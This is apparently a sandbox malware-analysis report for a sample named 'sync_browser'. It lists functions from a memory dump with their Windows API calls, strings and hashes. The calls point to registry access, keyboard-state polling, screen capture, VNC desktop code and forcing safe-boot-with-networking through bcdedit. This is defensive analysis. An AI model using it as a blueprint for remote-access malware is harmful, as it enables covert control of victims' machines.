Download Yara Rule

APIs

Part of subcall function 00007FF74000D390: GetModuleFileNameA.KERNEL32 ref: 00007FF74000D3BB

GetPrivateProfileIntA.KERNEL32 ref: 00007FF740057CC9

Part of subcall function 00007FF740057650: GetPrivateProfileIntA.KERNEL32 ref: 00007FF740057689
Part of subcall function 00007FF740057650: RegCreateKeyExA.ADVAPI32 ref: 00007FF7400576DD
Part of subcall function 00007FF740057650: RegCreateKeyExA.ADVAPI32 ref: 00007FF740057722

Part of subcall function 00007FF7400578E0: GetPrivateProfileIntA.KERNEL32 ref: 00007FF74005792E
Part of subcall function 00007FF7400578E0: RegQueryValueExA.ADVAPI32 ref: 00007FF74005796A
Part of subcall function 00007FF7400578E0: RegQueryValueExA.ADVAPI32 ref: 00007FF7400579B2

Strings

UseRegistry, xrefs: 00007FF740057CB8
admin, xrefs: 00007FF740057CBF
group2, xrefs: 00007FF740057CEC, 00007FF740057D23

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: PrivateProfile$CreateQueryValue$FileModuleName
String ID: UseRegistry$admin$group2
API String ID: 1728753321-2518265958
Opcode ID: 42ecbddd9c1df14715f3163af6785be1f325581b827072a0f24e6963c90d4554
Instruction ID: 20e0fb7fe3f1775bab68283bb1a15f7376c4ee519b33488f2c718ce4305a9c43
Opcode Fuzzy Hash: 42ecbddd9c1df14715f3163af6785be1f325581b827072a0f24e6963c90d4554
Instruction Fuzzy Hash: 0A11B725A1C946D1EA60FB20F4627F9A361FF98344FC51036DA4D467BADE3CF1059A60

Function 00007FF740057D50 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF74000D390: GetModuleFileNameA.KERNEL32 ref: 00007FF74000D3BB

GetPrivateProfileIntA.KERNEL32 ref: 00007FF740057D89

Part of subcall function 00007FF740057650: GetPrivateProfileIntA.KERNEL32 ref: 00007FF740057689
Part of subcall function 00007FF740057650: RegCreateKeyExA.ADVAPI32 ref: 00007FF7400576DD
Part of subcall function 00007FF740057650: RegCreateKeyExA.ADVAPI32 ref: 00007FF740057722

Part of subcall function 00007FF7400578E0: GetPrivateProfileIntA.KERNEL32 ref: 00007FF74005792E
Part of subcall function 00007FF7400578E0: RegQueryValueExA.ADVAPI32 ref: 00007FF74005796A
Part of subcall function 00007FF7400578E0: RegQueryValueExA.ADVAPI32 ref: 00007FF7400579B2

Strings

UseRegistry, xrefs: 00007FF740057D78
group3, xrefs: 00007FF740057DAC, 00007FF740057DE3
admin, xrefs: 00007FF740057D7F

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: PrivateProfile$CreateQueryValue$FileModuleName
String ID: UseRegistry$admin$group3
API String ID: 1728753321-3776872688
Opcode ID: da8d5682ec0159b53c6e6ac02bc9a146a6fe897d91bd88be9db6412787fbbace
Instruction ID: 930e548d0799cefe58bb193e560f83572349a2a3629cf7b15df26bf3b7324ec4
Opcode Fuzzy Hash: da8d5682ec0159b53c6e6ac02bc9a146a6fe897d91bd88be9db6412787fbbace
Instruction Fuzzy Hash: 1711B726A1C946D1EA61FB20F4617F9A361FF98344FC50036DA4D467BADE3CF1049A60

Function 00007FF740057E10 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF74000D390: GetModuleFileNameA.KERNEL32 ref: 00007FF74000D3BB

GetPrivateProfileIntA.KERNEL32 ref: 00007FF740057E50

Part of subcall function 00007FF740057650: GetPrivateProfileIntA.KERNEL32 ref: 00007FF740057689
Part of subcall function 00007FF740057650: RegCreateKeyExA.ADVAPI32 ref: 00007FF7400576DD
Part of subcall function 00007FF740057650: RegCreateKeyExA.ADVAPI32 ref: 00007FF740057722

Part of subcall function 00007FF7400577F0: GetPrivateProfileIntA.KERNEL32 ref: 00007FF740057840
Part of subcall function 00007FF7400577F0: RegQueryValueExA.ADVAPI32 ref: 00007FF74005787D

Strings

UseRegistry, xrefs: 00007FF740057E3F
admin, xrefs: 00007FF740057E46
locdom1, xrefs: 00007FF740057E69, 00007FF740057E82

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: PrivateProfile$Create$FileModuleNameQueryValue
String ID: UseRegistry$admin$locdom1
API String ID: 1788981264-2648182776
Opcode ID: 90366ba7cc0c0a2881363750c1573ef4067fd92e56bfccd46d2f838935763d96
Instruction ID: f31c9dc3bae64354fccd623c139b67eab8831f9cbeef772e2d84c245d1e5537f
Opcode Fuzzy Hash: 90366ba7cc0c0a2881363750c1573ef4067fd92e56bfccd46d2f838935763d96
Instruction Fuzzy Hash: FC010825A1CA46D1FA21FB24B8917B9A2A1EF5C344FC10035D94D467BADE3CF548DA60

Function 00007FF74002C210 Relevance: 6.0, APIs: 4, Instructions: 41fileCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32 ref: 00007FF74002C23F
FindFirstFileA.KERNEL32 ref: 00007FF74002C24F
SetErrorMode.KERNEL32 ref: 00007FF74002C25A
FindClose.KERNEL32 ref: 00007FF74002C26D

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: ErrorFindMode$CloseFileFirst
String ID:
API String ID: 2885216544-0
Opcode ID: 0223ee3f43c164e8854e7b1b386b18195b9e4c924526049b6427bad48412c67f
Instruction ID: 39ec3355f26b84483c146f67678051aff9c50e081cd6edb8170650ad7c370cb4
Opcode Fuzzy Hash: 0223ee3f43c164e8854e7b1b386b18195b9e4c924526049b6427bad48412c67f
Instruction Fuzzy Hash: EF01693571C741C6DA10AF21B4546B9A361FB4CBE0F804230DEAD437A8CE3DE8458710

Function 00007FF74000BB70 Relevance: 1.5, APIs: 1, Instructions: 35networkCOMMON

Download Yara Rule

APIs

recv.WS2_32 ref: 00007FF74000BBAF

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 1f8284c9b81bc00274cff331346e792dc04ed1df2d7324caccb88a26b9367104
Instruction ID: 226aeea26984cd616a5f38f013835ab5936d38ebeb876b05c68c689c9bfe5570
Opcode Fuzzy Hash: 1f8284c9b81bc00274cff331346e792dc04ed1df2d7324caccb88a26b9367104
Instruction Fuzzy Hash: 77F0C821B1CA82C2E350BB2A7940665F591BF84BE0F984231EE6943FEDDF7CE4414610

Function 00007FF7400231B0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetKeyboardState.USER32 ref: 00007FF7400231D3

Part of subcall function 00007FF7400174C0: GetKeyState.USER32 ref: 00007FF740017509
Part of subcall function 00007FF7400174C0: GetKeyState.USER32 ref: 00007FF740017523
Part of subcall function 00007FF7400174C0: GetKeyState.USER32 ref: 00007FF74001753D
Part of subcall function 00007FF7400174C0: GetKeyState.USER32 ref: 00007FF740017557
Part of subcall function 00007FF7400174C0: GetKeyState.USER32 ref: 00007FF740017571
Part of subcall function 00007FF7400174C0: GetKeyState.USER32 ref: 00007FF74001758B
Part of subcall function 00007FF7400174C0: TryEnterCriticalSection.KERNEL32 ref: 00007FF7400175D6
Part of subcall function 00007FF7400174C0: LeaveCriticalSection.KERNEL32 ref: 00007FF74001760F

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: State$CriticalSection$EnterKeyboardLeave
String ID:
API String ID: 4104749118-0
Opcode ID: 0256701cad5363ec1328f5542e36a1f7f43bbe659b594c5479dffbbec42ae8d9
Instruction ID: d2f7c8f521514da599afb36490118555835b5922f63cefbfe7c70acf9f760ab8
Opcode Fuzzy Hash: 0256701cad5363ec1328f5542e36a1f7f43bbe659b594c5479dffbbec42ae8d9
Instruction Fuzzy Hash: 35F08961A1C551C1E735B722E8213B6F2A1FF8C744F844135998D096B9DF2CF559CA10

Function 00007FF740030D40 Relevance: 45.7, APIs: 25, Strings: 1, Instructions: 239windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32 ref: 00007FF740030D8E
PtInRect.USER32 ref: 00007FF740030DCC
GetIconInfo.USER32 ref: 00007FF740030E05
GetSystemMetrics.USER32 ref: 00007FF740030E7F
GetSystemMetrics.USER32 ref: 00007FF740030E8C
SelectObject.GDI32 ref: 00007FF740030F37
CreateCompatibleDC.GDI32 ref: 00007FF740030F50
CreateCompatibleDC.GDI32 ref: 00007FF740030F60
SelectObject.GDI32 ref: 00007FF740030F70
SelectObject.GDI32 ref: 00007FF740030F80
BitBlt.GDI32 ref: 00007FF740030FCD
BitBlt.GDI32 ref: 00007FF740031017
SelectObject.GDI32 ref: 00007FF740031027
SelectObject.GDI32 ref: 00007FF740031033
SelectObject.GDI32 ref: 00007FF74003103F
DeleteDC.GDI32 ref: 00007FF740031048
DeleteDC.GDI32 ref: 00007FF740031051
SelectObject.GDI32 ref: 00007FF740031067
DrawIconEx.USER32 ref: 00007FF7400310AA
SelectObject.GDI32 ref: 00007FF7400310BA
DeleteObject.GDI32 ref: 00007FF7400310C9
DeleteObject.GDI32 ref: 00007FF7400310D8
GdiFlush.GDI32 ref: 00007FF7400310FE
DeleteObject.GDI32 ref: 00007FF7400311B9
DeleteObject.GDI32 ref: 00007FF7400311CC

Strings

F, xrefs: 00007FF740030FF1

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: Object$Select$Delete$CompatibleCreateIconMetricsSystem$CursorDrawFlushInfoRect
String ID: F
API String ID: 2202639625-1304234792
Opcode ID: b79674502bec6eb6e9178b59d754768edd22f48091c48e79f06fd71b0c89d9c2
Instruction ID: 6fe88ff0af758bb7e6a904e628ac3e5972a06b2106f5be8192167726f33edca3
Opcode Fuzzy Hash: b79674502bec6eb6e9178b59d754768edd22f48091c48e79f06fd71b0c89d9c2
Instruction Fuzzy Hash: 5FC13F36A08696CBE790EF65D6489EE73A9FF88744F410436EE0953718DF78E844CB20

Function 00007FF74002EBF0 Relevance: 38.7, APIs: 14, Strings: 8, Instructions: 242sleepCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32 ref: 00007FF74002EC60
Sleep.KERNEL32 ref: 00007FF74002EC6B
SetEvent.KERNEL32 ref: 00007FF74002ECA2
CloseHandle.KERNEL32 ref: 00007FF74002EE83
CloseHandle.KERNEL32 ref: 00007FF74002EE99
FreeLibrary.KERNEL32 ref: 00007FF74002EE5F

Part of subcall function 00007FF740033170: PostThreadMessageA.USER32 ref: 00007FF7400331B6
Part of subcall function 00007FF740033170: WaitForSingleObject.KERNEL32 ref: 00007FF7400331C8
Part of subcall function 00007FF740033170: TerminateThread.KERNEL32 ref: 00007FF7400331F3
Part of subcall function 00007FF740033170: CloseHandle.KERNEL32 ref: 00007FF740033200

ReleaseDC.USER32 ref: 00007FF74002EED3
DeleteDC.GDI32 ref: 00007FF74002EEF9
DeleteObject.GDI32 ref: 00007FF74002EF0D
free.LIBCMT ref: 00007FF74002EF1A
DeleteCriticalSection.KERNEL32 ref: 00007FF74002EF27
DeleteCriticalSection.KERNEL32 ref: 00007FF74002EF35
DeleteObject.GDI32 ref: 00007FF74002EF93
free.LIBCMT ref: 00007FF74002EFA0

Strings

vncdesktop.cpp : ~vncDesktop:: second request to close InitWindowthread, xrefs: 00007FF74002EEA8
vncdesktop.cpp : ~vncDesktop , xrefs: 00007FF74002EC0F
vncdesktop.cpp : Desktop thread running, force close , xrefs: 00007FF74002EC83
vncdesktop.cpp : failed to DeleteDC hrootdc, xrefs: 00007FF74002EEDD
2, xrefs: 00007FF74002EC73
vncdesktop.cpp : ~vncDesktop m_lGridsList.clear, xrefs: 00007FF74002EE00
vncdesktop.cpp : delete ((RGBPixelList) , xrefs: 00007FF74002EDD7
vncdesktop.cpp : ~vncDesktop Shutdown(), xrefs: 00007FF74002ED38

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: Delete$CloseHandleObject$CriticalEventSectionThreadfree$FreeLibraryMessagePostReleaseSingleSleepTerminateWait
String ID: 2$vncdesktop.cpp : Desktop thread running, force close $vncdesktop.cpp : delete ((RGBPixelList) $vncdesktop.cpp : failed to DeleteDC hrootdc$vncdesktop.cpp : ~vncDesktop $vncdesktop.cpp : ~vncDesktop Shutdown()$vncdesktop.cpp : ~vncDesktop m_lGridsList.clear$vncdesktop.cpp : ~vncDesktop:: second request to close InitWindowthread
API String ID: 2560957196-1231019345
Opcode ID: 3f52801594e27f2029a31436942ce8f2131e88a332c03dd00a5becdb50ed7808
Instruction ID: 78b8c98a9ec540ecf07032c100b129e550aaa145a9bceca0790914cbc3ffc11a
Opcode Fuzzy Hash: 3f52801594e27f2029a31436942ce8f2131e88a332c03dd00a5becdb50ed7808
Instruction Fuzzy Hash: 35B13822A1CAC2C5EB64BF65D8406F9A365EF84B84F844036DA0D57BA9CF38F945D360

Function 00007FF7400CDC9C Relevance: 38.6, APIs: 16, Strings: 6, Instructions: 136libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00007FF7400B8C19,?,?,?,00007FF7400B748C), ref: 00007FF7400CDCE1
GetProcAddress.KERNEL32(?,00007FF7400B8C19,?,?,?,00007FF7400B748C), ref: 00007FF7400CDCFD
EncodePointer.KERNEL32(?,00007FF7400B8C19,?,?,?,00007FF7400B748C), ref: 00007FF7400CDD0F
GetProcAddress.KERNEL32(?,00007FF7400B8C19,?,?,?,00007FF7400B748C), ref: 00007FF7400CDD26
EncodePointer.KERNEL32(?,00007FF7400B8C19,?,?,?,00007FF7400B748C), ref: 00007FF7400CDD2F
GetProcAddress.KERNEL32(?,00007FF7400B8C19,?,?,?,00007FF7400B748C), ref: 00007FF7400CDD46
EncodePointer.KERNEL32(?,00007FF7400B8C19,?,?,?,00007FF7400B748C), ref: 00007FF7400CDD4F
GetProcAddress.KERNEL32(?,00007FF7400B8C19,?,?,?,00007FF7400B748C), ref: 00007FF7400CDD66
EncodePointer.KERNEL32(?,00007FF7400B8C19,?,?,?,00007FF7400B748C), ref: 00007FF7400CDD6F
GetProcAddress.KERNEL32(?,00007FF7400B8C19,?,?,?,00007FF7400B748C), ref: 00007FF7400CDD8E
EncodePointer.KERNEL32(?,00007FF7400B8C19,?,?,?,00007FF7400B748C), ref: 00007FF7400CDD97
DecodePointer.KERNEL32(?,00007FF7400B8C19,?,?,?,00007FF7400B748C), ref: 00007FF7400CDDCA
DecodePointer.KERNEL32(?,00007FF7400B8C19,?,?,?,00007FF7400B748C), ref: 00007FF7400CDDDA
DecodePointer.KERNEL32(?,00007FF7400B8C19,?,?,?,00007FF7400B748C), ref: 00007FF7400CDE30
DecodePointer.KERNEL32(?,00007FF7400B8C19,?,?,?,00007FF7400B748C), ref: 00007FF7400CDE51
DecodePointer.KERNEL32(?,00007FF7400B8C19,?,?,?,00007FF7400B748C), ref: 00007FF7400CDE6B

Strings

MessageBoxW, xrefs: 00007FF7400CDCF3
GetActiveWindow, xrefs: 00007FF7400CDD15
GetUserObjectInformationW, xrefs: 00007FF7400CDD55
GetProcessWindowStation, xrefs: 00007FF7400CDD84
GetLastActivePopup, xrefs: 00007FF7400CDD35
USER32.DLL, xrefs: 00007FF7400CDCDA

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: Pointer$AddressDecodeEncodeProc$LibraryLoad
String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationW$MessageBoxW$USER32.DLL
API String ID: 2643518689-564504941
Opcode ID: 3f01601e3236801bc7f61e640a5cdc001557def2435a7818b715a9f11b20129c
Instruction ID: e28d79fcd7e0860aa613e664b56d3dea4dd2e0fb2acfc496d6518719915471a0
Opcode Fuzzy Hash: 3f01601e3236801bc7f61e640a5cdc001557def2435a7818b715a9f11b20129c
Instruction Fuzzy Hash: FE51E724A1EB07C1EE59BB15B854578A3A0AF59B80F84003ADC2E4B7B8EF3CF4559730

Function 00007FF740013210 Relevance: 36.9, APIs: 10, Strings: 11, Instructions: 133COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32 ref: 00007FF740013243
GetEnvironmentVariableA.KERNEL32 ref: 00007FF740013265
GetPrivateProfileStringA.KERNEL32 ref: 00007FF7400132B7
GetPrivateProfileStringA.KERNEL32 ref: 00007FF7400132FF
SetFileAttributesA.KERNEL32 ref: 00007FF740013361
WritePrivateProfileStringA.KERNEL32 ref: 00007FF74001337D
GetLastError.KERNEL32 ref: 00007FF740013383
GetEnvironmentVariableA.KERNEL32 ref: 00007FF7400133A1
GetForegroundWindow.USER32 ref: 00007FF740013445
ShellExecuteExA.SHELL32 ref: 00007FF74001347F

Strings

default, xrefs: 00007FF740013289
/safeboot:network, xrefs: 00007FF740013332
bcdedit.exe, xrefs: 00007FF740013417
operating systems, xrefs: 00007FF7400132F0, 00007FF740013376
SystemRoot, xrefs: 00007FF740013392
boot loader, xrefs: 00007FF74001329B
SYSTEMDRIVE, xrefs: 00007FF74001325E
runas, xrefs: 00007FF740013453
\system32\, xrefs: 00007FF7400133E1
twork, xrefs: 00007FF74001342B
/boot.ini, xrefs: 00007FF740013282

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: PrivateProfileString$EnvironmentVariable$AttributesErrorExecuteFileForegroundLastShellVersionWindowWrite
String ID: /safeboot:network$/boot.ini$SYSTEMDRIVE$SystemRoot$\system32\$bcdedit.exe$boot loader$default$operating systems$runas$twork
API String ID: 3746257916-1709497384
